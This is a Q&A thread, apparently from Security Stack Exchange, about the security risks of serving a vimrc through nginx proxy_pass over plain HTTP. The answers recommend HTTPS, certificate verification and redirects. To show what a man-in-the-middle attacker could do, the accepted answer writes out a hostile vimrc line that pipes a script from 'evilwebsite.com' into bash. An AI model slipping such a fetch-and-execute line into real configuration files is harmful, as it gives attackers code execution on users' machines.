# Security concerns when using nginx as a lightweight URL shortener

Tags: url-redirection, nginx

I wish to use nginx as a lightweight URL shortener.
To be exact, assuming my domain name is `example.com`, I have this most basic `nginx.conf`:

```
events {}
http {
  server {
    listen 80;
    location = /vimrc {
      proxy_pass https://some/publicly/available/url/to/vimrc;                                
    }
    ... # similar locations follow
  }
}
```

So, whenever I wish to deploy my vim configuration, I can simply do: `curl example.com/vimrc`.

This seems to be working as intended, although with almost zero knowledge of nginx, I am a little concerned of default nginx behavior (which I am not aware of) that may expose my server to security related threats.

It should be noted I currently don't mind running on port 80. (I am well aware of mitm, and that the connection is in plaintext, but this is not something I wish to deal with at the moment).

## Update

- I've modified the configuration to use `return 301 https://url/to/vimrc`.
- I will probably look into [Configuring SSL](http://nginx.org/en/docs/http/configuring_https_servers.html) as well, as the small chance of MITM is indeed not worth the risk.

Comment: This question is about configuring nginx and not directly related to security. I voted to migrate it to https://serverfault.com

Comment: @Philipp, it may not be directly related to security, but from an operational perspective only, I has a working solution before posting this question here. What drove me to post it here were only security concerns.

Answer (score 2, accepted):

The only vulnerability here is the http:// connection that you wished to ignore.

Suppose that there *is* a MITM, and the attacker added to your `.vimrc`

```
command Q !curl http://evilwebsite.com/infect.sh | bash
```

Then, misspelling `:q` as `:Q` would infect your machine.¹ Is it really worth the risk?

Note that even if you secured your connection to example.com, the same risk would be there if the proxying was done through http:.

The basic solution would be to do [configure SSL](http://nginx.org/en/docs/http/configuring_https_servers.html), and it will surely be useful for other things, too.

But in this specific case, where nginx is fetching a public https:// url, you could simply replace this with a redirect:

```
rewrite ^ https://some/publicly/available/url/to/vimrc ;
```

and **manually verify that curl is redirecting you to the expected server**.

*Still, having a routine of downloading of your dot files from someone else's server strongly relies on them being both honest and not compromised.*

¹ There are probably better vector.

Comment: [`return`](http://nginx.org/en/docs/http/ngx_http_rewrite_module.html#return) `301 https://some/publicly/available/url/to/vimrc;` is a way to redirect without involving regular expressions.

Answer (score 1):

On top of what [Ángel wrote](//security.stackexchange.com/a/120992/12480), the connection between your Nginx server and `https://some/` can be MITMed, because `some`'s certificate is not verified by default. You would need to set [`proxy_ssl_trusted_certificate` and `proxy_ssl_verify`](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_ssl_trusted_certificate) to enforce that.

You should also look at [`proxy_ignore_headers`](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_ignore_headers) for headers such as `Set-Cookie` and `X-Accel-Redirect` that a malicious backend could potentially use to do problematic things.

It would be less strange and perhaps have fewer security implications to use [`return`](http://nginx.org/en/docs/http/ngx_http_rewrite_module.html#return) or `rewrite` to redirect to `https://some/`, instead of `proxy_pass`ing it, but not *that* much can go wrong, especially if you trust your backend and `example.com` isn't much of a target.